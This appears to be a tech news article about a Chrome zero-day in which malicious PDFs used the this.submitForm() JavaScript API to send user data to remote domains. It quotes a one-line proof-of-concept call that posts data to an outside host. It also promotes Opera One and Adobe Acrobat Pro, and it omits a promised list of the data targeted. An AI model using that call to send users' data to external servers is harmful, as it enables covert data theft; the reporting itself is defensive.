Chrome bug lets hackers collect user data via PDF files

3 min. read

Updated onOctober 4, 2023

updated onOctober 4, 2023

Share this article

Improve this guide

Read our disclosure page to find out how can you help Windows Report sustain the editorial teamRead more

Key notes

Exploit detection service EdgeSpot discovered an intriguingChromezero-day vulnerability exploiting PDF documents.

The vulnerability allows attackers toharvest sensitive datausing maliciousPDFdocuments opened inChrome.

As soon as the victim opens the respectivePDF filesinGoogle Chrome, a malicious program starts working in the background by collecting user data.

Thedatais then forwarded to the remote server that is being controlled by the hackers. You might be wondering whatdatais being sucked by the attackers, they target the followingdataon your PC:

Beware of malware-ridden PDF files

Expertsspottedthat one of the two domainsreadnotify[.]comorburpcollaborator[.]netwas receiving thedata.

They revealed that the attackers are using thethis.submitForm()PDFJavascript API to collect the sensitive information of the users.

We tested it with a minimal PoC, a simple API call likethis.submitForm(‘http://google.com/test’)will makeGoogle Chromesend the personaldatato google.com.

ThisChromebug was being exploited by two distinct sets of maliciousPDF files, both of them circulated in October 2017 and September 2018, respectively.

Notably, the collecteddatacan be used by the attackers to fine-tune attacks in the future. Reports suggest that the first batch of files was compiled using ReadNotify’sPDFtracking service.

Users can utilize the service to keep track of user views. EdgeSpot has not shared any details regarding the nature of the second set ofPDF files.

Quick tip:In these troubled times, we are attacked with malware, phishing, and Trojans at every step, so we have to be a lot more vigilant and stay protected.

And as this is a problem specific to Chrome, you can avoid that threat and all others with a security-oriented browser like Opera One. It comes with built-in VPN, Ad blocker and even AI.

Opera One

How can I stay protected from PDF vulnerabilities?

Adobe and Chrome make a good match when it comes to handling PDF files. By installing the Adobe Extension for Chrome, you can review and manipulate PDFs to your liking without leaving your favorite browser.

Despite its robust structure, malware hidden in PDF files might not get detected if you’re using the standard version of the Reader.

The professional version is recommended to guarantee your protection and keep your data away from hackers.

Although it’s not free, the price you will pay is rather small for the plethora of additional features you will enjoy including the enhanced security of your PDF files.

There is also a 7-day free trial included so that you can get a taste of the full Pro experience before making the purchase.

⇒Get Adobe Actobat Pro

The Exploit detection service EdgeSpot wanted to alert Chrome users about the potential risks because the patch was not expected to be released in the near future.

EdgeSpot reported to Google about the vulnerability last year and the company promised to release a patch in late April.

However, you can consider using a temporary workaround to the problem by locally viewing the receivedPDFdocuments using another reader app.

Alternatively, you can also open yourPDFdocuments inChromeby disconnecting your systems from the Internet.

Chrome bug lets hackers collect user data via PDF files#

Beware of malware-ridden PDF files#

Opera One#

How can I stay protected from PDF vulnerabilities?#

Chrome bug lets hackers collect user data via PDF files

Beware of malware-ridden PDF files

Opera One

How can I stay protected from PDF vulnerabilities?